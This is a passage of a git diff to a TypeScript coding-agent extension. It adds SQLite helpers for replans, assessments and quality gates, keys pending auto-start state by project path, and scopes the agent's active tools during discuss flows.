+        try { adapter.exec("ROLLBACK"); } catch (e) { logWarning("db", `rollback failed: ${(e as Error).message}`); }
         throw txErr;
       }
       return { ...merged, conflicts };
     } finally {
-      try {
-        adapter.exec("DETACH DATABASE wt");
-      } catch {
-        /* best-effort */
-      }
+      try { adapter.exec("DETACH DATABASE wt"); } catch (e) { logWarning("db", `detach worktree DB failed: ${(e as Error).message}`); }
     }
   } catch (err) {
-    process.stderr.write(
-      `gsd-db: worktree DB reconciliation failed: ${(err as Error).message}\n`,
-    );
+    logError("db", "worktree DB reconciliation failed", { error: (err as Error).message });
     return { ...zero, conflicts };
   }
 }
+
+// ─── Replan & Assessment Helpers ──────────────────────────────────────────
+
+export function insertReplanHistory(entry: {
+  milestoneId: string;
+  sliceId?: string | null;
+  taskId?: string | null;
+  summary: string;
+  previousArtifactPath?: string | null;
+  replacementArtifactPath?: string | null;
+}): void {
+  if (!currentDb) throw new GSDError(GSD_STALE_STATE, "gsd-db: No database open");
+  // INSERT OR REPLACE: idempotent on (milestone_id, slice_id, task_id) via schema v11 unique index.
+  // Retrying the same replan silently updates summary instead of accumulating duplicate rows.
+  currentDb.prepare(
+    `INSERT OR REPLACE INTO replan_history (milestone_id, slice_id, task_id, summary, previous_artifact_path, replacement_artifact_path, created_at)
+     VALUES (:milestone_id, :slice_id, :task_id, :summary, :previous_artifact_path, :replacement_artifact_path, :created_at)`,
+  ).run({
+    ":milestone_id": entry.milestoneId,
+    ":slice_id": entry.sliceId ?? null,
+    ":task_id": entry.taskId ?? null,
+    ":summary": entry.summary,
+    ":previous_artifact_path": entry.previousArtifactPath ?? null,
+    ":replacement_artifact_path": entry.replacementArtifactPath ?? null,
+    ":created_at": new Date().toISOString(),
+  });
+}
+
+export function insertAssessment(entry: {
+  path: string;
+  milestoneId: string;
+  sliceId?: string | null;
+  taskId?: string | null;
+  status: string;
+  scope: string;
+  fullContent: string;
+}): void {
+  if (!currentDb) throw new GSDError(GSD_STALE_STATE, "gsd-db: No database open");
+  currentDb.prepare(
+    `INSERT OR REPLACE INTO assessments (path, milestone_id, slice_id, task_id, status, scope, full_content, created_at)
+     VALUES (:path, :milestone_id, :slice_id, :task_id, :status, :scope, :full_content, :created_at)`,
+  ).run({
+    ":path": entry.path,
+    ":milestone_id": entry.milestoneId,
+    ":slice_id": entry.sliceId ?? null,
+    ":task_id": entry.taskId ?? null,
+    ":status": entry.status,
+    ":scope": entry.scope,
+    ":full_content": entry.fullContent,
+    ":created_at": new Date().toISOString(),
+  });
+}
+
+export function deleteAssessmentByScope(milestoneId: string, scope: string): void {
+  if (!currentDb) throw new GSDError(GSD_STALE_STATE, "gsd-db: No database open");
+  currentDb.prepare(
+    `DELETE FROM assessments WHERE milestone_id = :mid AND scope = :scope`,
+  ).run({ ":mid": milestoneId, ":scope": scope });
+}
+
+export function deleteVerificationEvidence(milestoneId: string, sliceId: string, taskId: string): void {
+  if (!currentDb) throw new GSDError(GSD_STALE_STATE, "gsd-db: No database open");
+  currentDb.prepare(
+    `DELETE FROM verification_evidence WHERE milestone_id = :mid AND slice_id = :sid AND task_id = :tid`,
+  ).run({ ":mid": milestoneId, ":sid": sliceId, ":tid": taskId });
+}
+
+export function deleteTask(milestoneId: string, sliceId: string, taskId: string): void {
+  if (!currentDb) throw new GSDError(GSD_STALE_STATE, "gsd-db: No database open");
+  transaction(() => {
+    // Must delete verification_evidence first (FK constraint)
+    currentDb!.prepare(
+      `DELETE FROM verification_evidence WHERE milestone_id = :mid AND slice_id = :sid AND task_id = :tid`,
+    ).run({ ":mid": milestoneId, ":sid": sliceId, ":tid": taskId });
+    currentDb!.prepare(
+      `DELETE FROM tasks WHERE milestone_id = :mid AND slice_id = :sid AND id = :tid`,
+    ).run({ ":mid": milestoneId, ":sid": sliceId, ":tid": taskId });
+  });
+}
+
+export function deleteSlice(milestoneId: string, sliceId: string): void {
+  if (!currentDb) throw new GSDError(GSD_STALE_STATE, "gsd-db: No database open");
+  transaction(() => {
+    // Cascade-style manual deletion: evidence → tasks → dependencies → slice
+    currentDb!.prepare(
+      `DELETE FROM verification_evidence WHERE milestone_id = :mid AND slice_id = :sid`,
+    ).run({ ":mid": milestoneId, ":sid": sliceId });
+    currentDb!.prepare(
+      `DELETE FROM tasks WHERE milestone_id = :mid AND slice_id = :sid`,
+    ).run({ ":mid": milestoneId, ":sid": sliceId });
+    currentDb!.prepare(
+      `DELETE FROM slice_dependencies WHERE milestone_id = :mid AND slice_id = :sid`,
+    ).run({ ":mid": milestoneId, ":sid": sliceId });
+    currentDb!.prepare(
+      `DELETE FROM slice_dependencies WHERE milestone_id = :mid AND depends_on_slice_id = :sid`,
+    ).run({ ":mid": milestoneId, ":sid": sliceId });
+    currentDb!.prepare(
+      `DELETE FROM slices WHERE milestone_id = :mid AND id = :sid`,
+    ).run({ ":mid": milestoneId, ":sid": sliceId });
+  });
+}
+
+export function updateSliceFields(milestoneId: string, sliceId: string, fields: {
+  title?: string;
+  risk?: string;
+  depends?: string[];
+  demo?: string;
+}): void {
+  if (!currentDb) throw new GSDError(GSD_STALE_STATE, "gsd-db: No database open");
+  currentDb.prepare(
+    `UPDATE slices SET
+      title = COALESCE(:title, title),
+      risk = COALESCE(:risk, risk),
+      depends = COALESCE(:depends, depends),
+      demo = COALESCE(:demo, demo)
+     WHERE milestone_id = :milestone_id AND id = :id`,
+  ).run({
+    ":milestone_id": milestoneId,
+    ":id": sliceId,
+    ":title": fields.title ?? null,
+    ":risk": fields.risk ?? null,
+    ":depends": fields.depends ? JSON.stringify(fields.depends) : null,
+    ":demo": fields.demo ?? null,
+  });
+}
+
+export function getReplanHistory(milestoneId: string, sliceId?: string): Array<Record<string, unknown>> {
+  if (!currentDb) return [];
+  if (sliceId) {
+    return currentDb.prepare(
+      `SELECT * FROM replan_history WHERE milestone_id = :mid AND slice_id = :sid ORDER BY created_at DESC`,
+    ).all({ ":mid": milestoneId, ":sid": sliceId });
+  }
+  return currentDb.prepare(
+    `SELECT * FROM replan_history WHERE milestone_id = :mid ORDER BY created_at DESC`,
+  ).all({ ":mid": milestoneId });
+}
+
+export function getAssessment(path: string): Record<string, unknown> | null {
+  if (!currentDb) return null;
+  const row = currentDb.prepare(
+    `SELECT * FROM assessments WHERE path = :path`,
+  ).get({ ":path": path });
+  return row ?? null;
+}
+
+// ─── Quality Gates ───────────────────────────────────────────────────────
+
+function rowToGate(row: Record<string, unknown>): GateRow {
+  return {
+    milestone_id: row["milestone_id"] as string,
+    slice_id: row["slice_id"] as string,
+    gate_id: row["gate_id"] as GateId,
+    scope: row["scope"] as GateScope,
+    task_id: (row["task_id"] as string) ?? "",
+    status: row["status"] as GateStatus,
+    verdict: (row["verdict"] as GateVerdict) || "",
+    rationale: (row["rationale"] as string) || "",
+    findings: (row["findings"] as string) || "",
+    evaluated_at: (row["evaluated_at"] as string) ?? null,
+  };
+}
+
+export function insertGateRow(g: {
+  milestoneId: string;
+  sliceId: string;
+  gateId: GateId;
+  scope: GateScope;
+  taskId?: string | null;
+  status?: GateStatus;
+}): void {
+  if (!currentDb) throw new GSDError(GSD_STALE_STATE, "gsd-db: No database open");
+  currentDb.prepare(
+    `INSERT OR IGNORE INTO quality_gates (milestone_id, slice_id, gate_id, scope, task_id, status)
+     VALUES (:mid, :sid, :gid, :scope, :tid, :status)`,
+  ).run({
+    ":mid": g.milestoneId,
+    ":sid": g.sliceId,
+    ":gid": g.gateId,
+    ":scope": g.scope,
+    ":tid": g.taskId ?? "",
+    ":status": g.status ?? "pending",
+  });
+}
+
+export function saveGateResult(g: {
+  milestoneId: string;
+  sliceId: string;
+  gateId: string;
+  taskId?: string | null;
+  verdict: GateVerdict;
+  rationale: string;
+  findings: string;
+}): void {
+  if (!currentDb) throw new GSDError(GSD_STALE_STATE, "gsd-db: No database open");
+  currentDb.prepare(
+    `UPDATE quality_gates
+     SET status = 'complete', verdict = :verdict, rationale = :rationale,
+         findings = :findings, evaluated_at = :evaluated_at
+     WHERE milestone_id = :mid AND slice_id = :sid AND gate_id = :gid
+       AND task_id = :tid`,
+  ).run({
+    ":mid": g.milestoneId,
+    ":sid": g.sliceId,
+    ":gid": g.gateId,
+    ":tid": g.taskId ?? "",
+    ":verdict": g.verdict,
+    ":rationale": g.rationale,
+    ":findings": g.findings,
+    ":evaluated_at": new Date().toISOString(),
+  });
+}
+
+export function getPendingGates(milestoneId: string, sliceId: string, scope?: GateScope): GateRow[] {
+  if (!currentDb) return [];
+  const sql = scope
+    ? `SELECT * FROM quality_gates WHERE milestone_id = :mid AND slice_id = :sid AND scope = :scope AND status = 'pending'`
+    : `SELECT * FROM quality_gates WHERE milestone_id = :mid AND slice_id = :sid AND status = 'pending'`;
+  const params: Record<string, unknown> = { ":mid": milestoneId, ":sid": sliceId };
+  if (scope) params[":scope"] = scope;
+  return currentDb.prepare(sql).all(params).map(rowToGate);
+}
+
+export function getGateResults(milestoneId: string, sliceId: string, scope?: GateScope): GateRow[] {
+  if (!currentDb) return [];
+  const sql = scope
+    ? `SELECT * FROM quality_gates WHERE milestone_id = :mid AND slice_id = :sid AND scope = :scope`
+    : `SELECT * FROM quality_gates WHERE milestone_id = :mid AND slice_id = :sid`;
+  const params: Record<string, unknown> = { ":mid": milestoneId, ":sid": sliceId };
+  if (scope) params[":scope"] = scope;
+  return currentDb.prepare(sql).all(params).map(rowToGate);
+}
+
+export function markAllGatesOmitted(milestoneId: string, sliceId: string): void {
+  if (!currentDb) return;
+  currentDb.prepare(
+    `UPDATE quality_gates SET status = 'omitted', verdict = 'omitted', evaluated_at = :now
+     WHERE milestone_id = :mid AND slice_id = :sid AND status = 'pending'`,
+  ).run({
+    ":mid": milestoneId,
+    ":sid": sliceId,
+    ":now": new Date().toISOString(),
+  });
+}
+
+export function getPendingSliceGateCount(milestoneId: string, sliceId: string): number {
+  if (!currentDb) return 0;
+  const row = currentDb.prepare(
+    `SELECT COUNT(*) as cnt FROM quality_gates
+     WHERE milestone_id = :mid AND slice_id = :sid AND scope = 'slice' AND status = 'pending'`,
+  ).get({ ":mid": milestoneId, ":sid": sliceId });
+  return row ? (row["cnt"] as number) : 0;
+}
diff --git a/src/resources/extensions/gsd/guided-flow-queue.ts b/src/resources/extensions/gsd/guided-flow-queue.ts
index 5b0b21e94..1a5e10aa3 100644
--- a/src/resources/extensions/gsd/guided-flow-queue.ts
+++ b/src/resources/extensions/gsd/guided-flow-queue.ts
@@ -244,12 +244,22 @@ export async function buildExistingMilestonesContext(
     }
   }
 
-  // For each milestone, include context and status
+  // For each milestone, include context and status.
+  // Completed milestones get a compact summary line only — loading their full
+  // CONTEXT.md + SUMMARY.md files is expensive and triggers 429 rate limits on
+  // projects with many completed milestones (#2379).
   for (const mid of milestoneIds) {
     const registryEntry = state.registry.find(m => m.id === mid);
     const status = registryEntry?.status ?? "unknown";
     const title = registryEntry?.title ?? mid;
 
+    // Completed milestones: emit a one-liner — the LLM only needs to know
+    // they exist for dedup/dependency purposes, not their full content.
+    if (status === "complete") {
+      sections.push(`### ${mid}: ${title}\n**Status:** complete`);
+      continue;
+    }
+
     const parts: string[] = [];
     parts.push(`### ${mid}: ${title}\n**Status:** ${status}`);
 
@@ -271,17 +281,6 @@ export async function buildExistingMilestonesContext(
       }
     }
 
-    // For completed milestones, include the summary if it exists
-    if (status === "complete") {
-      const summaryFile = resolveMilestoneFile(basePath, mid, "SUMMARY");
-      if (summaryFile) {
-        const content = await loadFile(summaryFile);
-        if (content) {
-          parts.push(`\n**Summary:**\n${content.trim()}`);
-        }
-      }
-    }
-
     // For active/pending/parked milestones, include the roadmap if it exists
     // (shows what's planned but not yet built)
     if (status === "active" || status === "pending" || status === "parked") {
diff --git a/src/resources/extensions/gsd/guided-flow.ts b/src/resources/extensions/gsd/guided-flow.ts
index 35fb43e64..451a9011c 100644
--- a/src/resources/extensions/gsd/guided-flow.ts
+++ b/src/resources/extensions/gsd/guided-flow.ts
@@ -8,7 +8,9 @@
 
 import type { ExtensionAPI, ExtensionContext, ExtensionCommandContext } from "@gsd/pi-coding-agent";
 import { showNextAction } from "../shared/tui.js";
-import { loadFile, parseRoadmap } from "./files.js";
+import { loadFile, saveFile } from "./files.js";
+import { isDbAvailable, getMilestoneSlices } from "./gsd-db.js";
+import { parseRoadmapSlices } from "./roadmap-slices.js";
 import { loadPrompt, inlineTemplate } from "./prompt-loader.js";
 import { buildSkillActivationBlock } from "./auto-prompts.js";
 import { deriveState } from "./state.js";
@@ -39,9 +41,32 @@ import { showProjectInit, offerMigration } from "./init-wizard.js";
 import { validateDirectory } from "./validate-directory.js";
 import { showConfirm } from "../shared/tui.js";
 import { debugLog } from "./debug-logger.js";
-import { findMilestoneIds, nextMilestoneId, reserveMilestoneId, getReservedMilestoneIds } from "./milestone-ids.js";
+import { findMilestoneIds, nextMilestoneId, reserveMilestoneId, getReservedMilestoneIds, clearReservedMilestoneIds } from "./milestone-ids.js";
 import { parkMilestone, discardMilestone } from "./milestone-actions.js";
-import { resolveModelWithFallbacksForUnit } from "./preferences-models.js";
+import { selectAndApplyModel } from "./auto-model-selection.js";
+import { DISCUSS_TOOLS_ALLOWLIST } from "./constants.js";
+import {
+  runPreparation,
+  formatCodebaseBrief,
+  formatPriorContextBrief,
+  formatEcosystemBrief,
+  type PreparationResult,
+} from "./preparation.js";
+
+// ─── Preparation result storage ─────────────────────────────────────────────
+// Stores the most recent preparation result for injection into discuss prompts.
+// S02 will consume this when building the prepared discussion prompt.
+let lastPreparationResult: PreparationResult | null = null;
+
+/** Get the most recent preparation result (for S02 prompt building). */
+export function getLastPreparationResult(): PreparationResult | null {
+  return lastPreparationResult;
+}
+
+/** Clear the preparation result (called after discussion completes). */
+export function clearPreparationResult(): void {
+  lastPreparationResult = null;
+}
 
 // ─── Re-exports (preserve public API for existing importers) ────────────────
 export {
@@ -55,6 +80,7 @@ export {
   buildExistingMilestonesContext,
 } from "./guided-flow-queue.js";
 import { getErrorMessage } from "./error-utils.js";
+import { logWarning } from "./workflow-logger.js";
 
 // ─── ID Generation with Reservation ─────────────────────────────────────────
 
@@ -79,25 +105,73 @@ function buildDocsCommitInstruction(_message: string): string {
 
 // ─── Auto-start after discuss ─────────────────────────────────────────────────
 
-/** Stashed context + flag for auto-starting after discuss phase completes */
-let pendingAutoStart: {
+/** Pending auto-start context, keyed by basePath for session isolation (#2985). */
+interface PendingAutoStartEntry {
   ctx: ExtensionCommandContext;
   pi: ExtensionAPI;
   basePath: string;
   milestoneId: string; // the milestone being discussed
   step?: boolean; // preserve step mode through discuss → auto transition
-} | null = null;
+  createdAt: number; // timestamp for staleness detection (#3274)
+}
 
-/** Returns the milestoneId being discussed, or null if no discussion is active */
-export function getDiscussionMilestoneId(): string | null {
-  return pendingAutoStart?.milestoneId ?? null;
+const pendingAutoStartMap = new Map<string, PendingAutoStartEntry>();
+
+/**
+ * Backward-compat bridge: returns a mutable reference to the entry matching
+ * basePath, or the sole entry when only one session exists.
+ * Internal use only — external code should use the Map directly.
+ */
+function _getPendingAutoStart(basePath?: string): PendingAutoStartEntry | null {
+  if (basePath) return pendingAutoStartMap.get(basePath) ?? null;
+  if (pendingAutoStartMap.size === 1) return pendingAutoStartMap.values().next().value!;
+  return null;
+}
+
+/**
+ * Store pending auto-start state for a project.
+ * Exported for testing (#2985).
+ */
+export function setPendingAutoStart(basePath: string, entry: { basePath: string; milestoneId: string; ctx?: ExtensionCommandContext; pi?: ExtensionAPI; step?: boolean; createdAt?: number }): void {
+  pendingAutoStartMap.set(basePath, { createdAt: Date.now(), ...entry } as PendingAutoStartEntry);
+}
+
+/**
+ * Clear pending auto-start state.
+ * If basePath is given, clears only that project.  Otherwise clears all.
+ * Exported for testing (#2985).
+ */
+export function clearPendingAutoStart(basePath?: string): void {
+  if (basePath) {
+    pendingAutoStartMap.delete(basePath);
+  } else {
+    pendingAutoStartMap.clear();
+  }
+}
+
+/**
+ * Returns the milestoneId being discussed for the given project.
+ * When basePath is omitted and only one session is active, returns that
+ * session's milestoneId for backward compatibility.  Returns null when
+ * multiple sessions exist and basePath is not specified (#2985 Bug 4).
+ */
+export function getDiscussionMilestoneId(basePath?: string): string | null {
+  if (basePath) {
+    return pendingAutoStartMap.get(basePath)?.milestoneId ?? null;
+  }
+  // Backward compat: return the sole entry's milestoneId, or null if ambiguous
+  if (pendingAutoStartMap.size === 1) {
+    return pendingAutoStartMap.values().next().value!.milestoneId;
+  }
+  return null;
 }
 
 /** Called from agent_end to check if auto-mode should start after discuss */
 export function checkAutoStartAfterDiscuss(): boolean {
-  if (!pendingAutoStart) return false;
+  const entry = _getPendingAutoStart();
+  if (!entry) return false;
 
-  const { ctx, pi, basePath, milestoneId, step } = pendingAutoStart;
+  const { ctx, pi, basePath, milestoneId, step } = entry;
 
   // Gate 1: Primary milestone must have CONTEXT.md or ROADMAP.md
   // The "discuss" path creates CONTEXT.md; the "plan" path creates ROADMAP.md.
@@ -117,12 +191,13 @@ export function checkAutoStartAfterDiscuss(): boolean {
   // Parse PROJECT.md for milestone sequence, warn if any are missing context.
   // Don't block — milestones can be intentionally queued without context.
   const projectFile = resolveGsdRootFile(basePath, "PROJECT");
+  let projectIds: string[] = [];
   if (projectFile) {
     try {
       const projectContent = readFileSync(projectFile, "utf-8");
-      const milestoneIds = parseMilestoneSequenceFromProject(projectContent);
-      if (milestoneIds.length > 1) {
-        const missing = milestoneIds.filter(id => {
+      projectIds = parseMilestoneSequenceFromProject(projectContent);
+      if (projectIds.length > 1) {
+        const missing = projectIds.filter(id => {
           const hasContext = !!resolveMilestoneFile(basePath, id, "CONTEXT");
           const hasDraft = !!resolveMilestoneFile(basePath, id, "CONTEXT-DRAFT");
           const hasDir = existsSync(join(gsdRoot(basePath), "milestones", id));
@@ -136,14 +211,22 @@ export function checkAutoStartAfterDiscuss(): boolean {
           );
         }
       }
-    } catch { /* non-fatal — PROJECT.md parsing failure shouldn't block auto-start */ }
+    } catch (e) { logWarning("guided", `PROJECT.md parsing failed: ${(e as Error).message}`); }
   }
 
   // Gate 4: Discussion manifest process verification (multi-milestone only)
   // The LLM writes DISCUSSION-MANIFEST.json after each Phase 3 gate decision.
-  // If the manifest exists but gates_completed < total, the LLM hasn't finished
-  // presenting all readiness gates to the user — block auto-start.
+  // If the project is multi-milestone, the manifest is required. When it is
+  // missing, fail closed instead of assuming the discussion finished.
   const manifestPath = join(gsdRoot(basePath), "DISCUSSION-MANIFEST.json");
+  const requiresManifest = projectIds.length > 1 || findMilestoneIds(basePath).length > 1;
+  if (requiresManifest && !existsSync(manifestPath)) {
+    ctx.ui.notify(
+      "Multi-milestone discussion manifest is missing. Auto-start will remain paused until the manifest is written.",
+      "warning",
+    );
+    return false;
+  }
   if (existsSync(manifestPath)) {
     try {
       const manifest = JSON.parse(readFileSync(manifestPath, "utf-8"));
@@ -156,9 +239,7 @@ export function checkAutoStartAfterDiscuss(): boolean {
       }
 
       // Cross-check manifest milestones against PROJECT.md if available
-      if (projectFile) {
-        const projectContent = readFileSync(projectFile, "utf-8");
-        const projectIds = parseMilestoneSequenceFromProject(projectContent);
+      if (projectIds.length > 0) {
         const manifestIds = Object.keys(manifest.milestones ?? {});
         const untracked = projectIds.filter(id => !manifestIds.includes(id));
         if (untracked.length > 0) {
@@ -168,7 +249,7 @@ export function checkAutoStartAfterDiscuss(): boolean {
           );
         }
       }
-    } catch { /* malformed manifest — warn but don't block */ }
+    } catch (e) { logWarning("guided", `discussion manifest verification failed: ${(e as Error).message}`); }
   }
 
   // Draft promotion cleanup: if a CONTEXT-DRAFT.md exists alongside the new
@@ -176,15 +257,16 @@ export function checkAutoStartAfterDiscuss(): boolean {
   try {
     const draftFile = resolveMilestoneFile(basePath, milestoneId, "CONTEXT-DRAFT");
     if (draftFile) unlinkSync(draftFile);
-  } catch { /* non-fatal — stale draft doesn't break anything, CONTEXT.md wins */ }
+  } catch (e) { logWarning("guided", `CONTEXT-DRAFT.md unlink failed: ${(e as Error).message}`); }
 
   // Cleanup: remove discussion manifest after auto-start (only needed during discussion)
-  try { unlinkSync(manifestPath); } catch { /* may not exist for single-milestone */ }
+  try { unlinkSync(manifestPath); } catch (e) { logWarning("guided", `manifest unlink failed: ${(e as Error).message}`); }
 
-  pendingAutoStart = null;
+  pendingAutoStartMap.delete(basePath);
+  ctx.ui.notify(`Milestone ${milestoneId} ready.`, "info");
   startAuto(ctx, pi, basePath, false, { step }).catch((err) => {
     ctx.ui.notify(`Auto-start failed: ${getErrorMessage(err)}`, "error");
-    if (process.env.GSD_DEBUG) console.error('[gsd] auto start error:', err);
+    logWarning("guided", `auto start error: ${getErrorMessage(err)}`);
     debugLog("auto-start-failed", { error: getErrorMessage(err) });
   });
   return true;
@@ -215,7 +297,7 @@ type UIContext = ExtensionContext;
  * This is the only way the wizard triggers work — everything else is the LLM's job.
  *
  * When a unitType is provided, resolves the user's model preference for that
- * phase (e.g., models.planning → "plan-milestone") and applies it before
+ * phase (e.g., models.planning → "plan-milestone", models.discuss → "discuss-milestone") and applies it before
  * dispatching. This ensures guided-flow dispatches respect the same
  * per-phase model preferences that auto-mode uses.
  */
@@ -226,27 +308,46 @@ async function dispatchWorkflow(
   ctx?: ExtensionContext,
   unitType?: string,
 ): Promise<void> {
-  // Apply model preference for this unit type (if configured)
+  // Route through the dynamic routing pipeline (complexity classification,
+  // tier downgrade, fallback chains) — same path as auto-mode dispatches (#2958).
   if (ctx && unitType) {
-    const modelConfig = resolveModelWithFallbacksForUnit(unitType);
-    if (modelConfig) {
-      const availableModels = ctx.modelRegistry.getAvailable();
-      const modelsToTry = [modelConfig.primary, ...modelConfig.fallbacks];
-
-      for (const modelId of modelsToTry) {
-        // Resolve model from available models (same logic as auto-model-selection)
-        const model = resolveAvailableModel(modelId, availableModels, ctx.model?.provider);
-        if (!model) continue;
-
-        const ok = await pi.setModel(model, { persist: false });
-        if (ok) {
-          debugLog("guided-flow-model-applied", { unitType, model: `${model.provider}/${model.id}` });
-          break;
-        }
-      }
+    const prefs = loadEffectiveGSDPreferences()?.preferences;
+    const result = await selectAndApplyModel(
+      ctx, pi, unitType, /* unitId */ "", /* basePath */ process.cwd(),
+      prefs, /* verbose */ false, /* autoModeStartModel */ null,
+    );
+    if (result.appliedModel) {
+      debugLog("guided-flow-model-applied", {
+        unitType,
+        model: `${result.appliedModel.provider}/${result.appliedModel.id}`,
+        routing: result.routing,
+      });
     }
   }
 
+  // Scope tools for discuss flows (#2949).
+  // Providers with grammar-based constrained decoding (xAI/Grok) return
+  // "Grammar is too complex" when the combined tool schema is too large.
+  // Discuss flows only need a small subset of GSD tools — strip the heavy
+  // planning/execution/completion tools to keep the grammar within limits.
+  let savedTools: string[] | null = null;
+  if (unitType?.startsWith("discuss-")) {
+    const currentTools = pi.getActiveTools();
+    savedTools = currentTools;
+    // Keep all non-GSD tools (builtins, other extensions) and only the
+    // GSD tools on the discuss allowlist.
+    const scopedTools = currentTools.filter(
+      (t) => !t.startsWith("gsd_") || DISCUSS_TOOLS_ALLOWLIST.includes(t),
+    );
+    pi.setActiveTools(scopedTools);
+    debugLog("discuss-tool-scoping", {
+      unitType,
+      before: currentTools.length,
+      after: scopedTools.length,
+      removed: currentTools.length - scopedTools.length,
+    });
+  }
+
   const workflowPath = process.env.GSD_WORKFLOW_PATH ?? join(process.env.HOME ?? "~", ".gsd", "agent", "GSD-WORKFLOW.md");
   const workflow = readFileSync(workflowPath, "utf-8");
 
@@ -258,6 +359,13 @@ async function dispatchWorkflow(
     },
     { triggerTurn: true },
   );
+
+  // Restore full tool set after the message is queued. The LLM turn has
+  // already captured the scoped set — restoring prevents the narrowed
+  // tools from leaking into subsequent dispatches (#3628).
+  if (savedTools) {
+    pi.setActiveTools(savedTools);
+  }
 }
 
 /**
@@ -347,6 +455,104 @@ function buildHeadlessDiscussPrompt(nextId: string, seedContext: string, _basePa
   });
 }
 
+/**
+ * Build the prepared discuss prompt with brief injection.
+ * Uses the discuss-prepared template which encodes the 4-layer discussion protocol.
+ *
+ * @param nextId - The milestone ID being discussed
+ * @param preamble - Preamble text for the discuss prompt
+ * @param _basePath - Root directory of the project (unused, kept for signature consistency)
+ * @param prepResult - Preparation result containing briefs to inject
+ * @returns The prepared discuss prompt string
+ */
+function buildPreparedPrompt(
+  nextId: string,
+  preamble: string,
+  _basePath: string,
+  prepResult: PreparationResult,
+): string {
+  const milestoneRel = `.gsd/milestones/${nextId}`;
+
+  // Use context-enhanced instead of context for prepared discussions
+  const inlinedTemplates = [
+    inlineTemplate("project", "Project"),
+    inlineTemplate("requirements", "Requirements"),
+    inlineTemplate("context-enhanced", "Context Enhanced"),
+    inlineTemplate("roadmap", "Roadmap"),
+    inlineTemplate("decisions", "Decisions"),
+  ].join("\n\n---\n\n");
+
+  // Format the briefs from the preparation result
+  const codebaseBrief = prepResult.codebaseBrief || formatCodebaseBrief(prepResult.codebase);
+  const priorContextBrief = prepResult.priorContextBrief || formatPriorContextBrief(prepResult.priorContext);
+  const ecosystemBrief = prepResult.ecosystemBrief || formatEcosystemBrief(prepResult.ecosystem);
+
+  return loadPrompt("discuss-prepared", {
+    milestoneId: nextId,
+    preamble,
+    codebaseBrief,
+    priorContextBrief,
+    ecosystemBrief,
+    contextPath: `${milestoneRel}/${nextId}-CONTEXT.md`,
+    roadmapPath: `${milestoneRel}/${nextId}-ROADMAP.md`,
+    inlinedTemplates,
+    commitInstruction: buildDocsCommitInstruction(`docs(${nextId}): context, requirements, and roadmap`),
+    multiMilestoneCommitInstruction: buildDocsCommitInstruction("docs: project plan — N milestones"),
+  });
+}
+
+/**
+ * Run preparation phase if enabled, then build the discuss prompt.
+ * This is the main entry point for new milestone discussions with preparation.
+ * Stores the preparation result for S02 to inject into the discuss prompt.
+ *
+ * When preparation succeeds, uses the discuss-prepared template with brief injection.
+ * Falls back to the standard discuss template when preparation is disabled or fails.
+ *
+ * @param ctx - Extension command context with UI for progress notifications
+ * @param nextId - The milestone ID being discussed
+ * @param preamble - Preamble text for the discuss prompt
+ * @param basePath - Root directory of the project
+ * @returns The discuss prompt string
+ */
+async function prepareAndBuildDiscussPrompt(
+  ctx: ExtensionCommandContext,
+  nextId: string,
+  preamble: string,
+  basePath: string,
+): Promise<string> {
+  // Clear stale preparation result immediately to prevent cross-session/project
+  // state leaks. This ensures data from a prior milestone/project never leaks
+  // into subsequent discussions (adversarial review fix #3602).
+  lastPreparationResult = null;
+
+  const prefs = loadEffectiveGSDPreferences()?.preferences ?? {};
+
+  // Run preparation if enabled (default: true)
+  if (prefs.discuss_preparation !== false) {
+    try {
+      const prepResult = await runPreparation(basePath, ctx.ui, {
+        discuss_preparation: prefs.discuss_preparation,
+        discuss_web_research: prefs.discuss_web_research,
+        discuss_depth: prefs.discuss_depth,
+      });
+      lastPreparationResult = prepResult;
+
+      // Use prepared prompt if preparation was enabled and produced results
+      if (prepResult.enabled) {
+        return buildPreparedPrompt(nextId, preamble, basePath, prepResult);
+      }
+    } catch {
+      // If preparation throws, ensure stale data doesn't persist
+      lastPreparationResult = null;
+    }
+  }
+
+  // Fall back to standard discuss prompt for backward compatibility
+  // lastPreparationResult is already null (cleared at entry or on error)
+  return buildDiscussPrompt(nextId, preamble, basePath);
+}
+
 /**
  * Bootstrap a .gsd/ project from scratch for headless use.
  * Ensures git repo, .gsd/ structure, gitignore, and preferences all exist.
@@ -377,6 +583,9 @@ export async function showHeadlessMilestoneCreation(
   basePath: string,
   seedContext: string,
 ): Promise<void> {
+  // Clear stale reservations from previous cancelled sessions (#2488)
+  clearReservedMilestoneIds();
+
   // Ensure .gsd/ is bootstrapped
   bootstrapGsdProject(basePath);
 
@@ -393,7 +602,7 @@ export async function showHeadlessMilestoneCreation(
   const prompt = buildHeadlessDiscussPrompt(nextId, seedContext, basePath);
 
   // Set pending auto start (auto-mode triggers on "Milestone X ready." via checkAutoStartAfterDiscuss)
-  pendingAutoStart = { ctx, pi, basePath, milestoneId: nextId };
+  pendingAutoStartMap.set(basePath, { ctx, pi, basePath, milestoneId: nextId, createdAt: Date.now() });
 
   // Dispatch — headless milestone creation is a planning activity
   await dispatchWorkflow(pi, prompt, "gsd-run", ctx, "plan-milestone");
@@ -413,7 +622,7 @@ async function buildDiscussSlicePrompt(
   sid: string,
   sTitle: string,
   base: string,
-  options?: { rediscuss?: boolean },
+  options?: { rediscuss?: boolean; structuredQuestionsAvailable?: string },
 ): Promise<string> {
   const inlined: string[] = [];
 
@@ -451,9 +660,16 @@ async function buildDiscussSlicePrompt(
   }
 
   // Completed slice summaries — what was already built that this slice builds on
-  if (roadmapContent) {
-    const roadmap = parseRoadmap(roadmapContent);
-    for (const s of roadmap.slices) {
+  // Ensure DB is open so getMilestoneSlices returns real data (#2560).
+  {
+    const { ensureDbOpen } = await import("./bootstrap/dynamic-tools.js");
+    await ensureDbOpen();
+    type NormSlice = { id: string; done: boolean };
+    let normSlices: NormSlice[] = [];
+    if (isDbAvailable()) {
+      normSlices = getMilestoneSlices(mid).map(s => ({ id: s.id, done: s.status === "complete" }));
+    }
+    for (const s of normSlices) {
       if (!s.done || s.id === sid) continue;
       const summaryPath = resolveSliceFile(base, mid, s.id, "SUMMARY");
       const summaryRel = relSliceFile(base, mid, s.id, "SUMMARY");
@@ -486,6 +702,7 @@ async function buildDiscussSlicePrompt(
     contextPath: sliceContextPath,
     projectRoot: base,
     inlinedTemplates,
+    structuredQuestionsAvailable: options?.structuredQuestionsAvailable ?? "false",
     commitInstruction: buildDocsCommitInstruction(`docs(${mid}/${sid}): slice context from discuss`),
   });
 }
@@ -511,9 +728,25 @@ export async function showDiscuss(
 
   const state = await deriveState(basePath);
 
-  // Guard: no active milestone
-  if (!state.activeMilestone) {
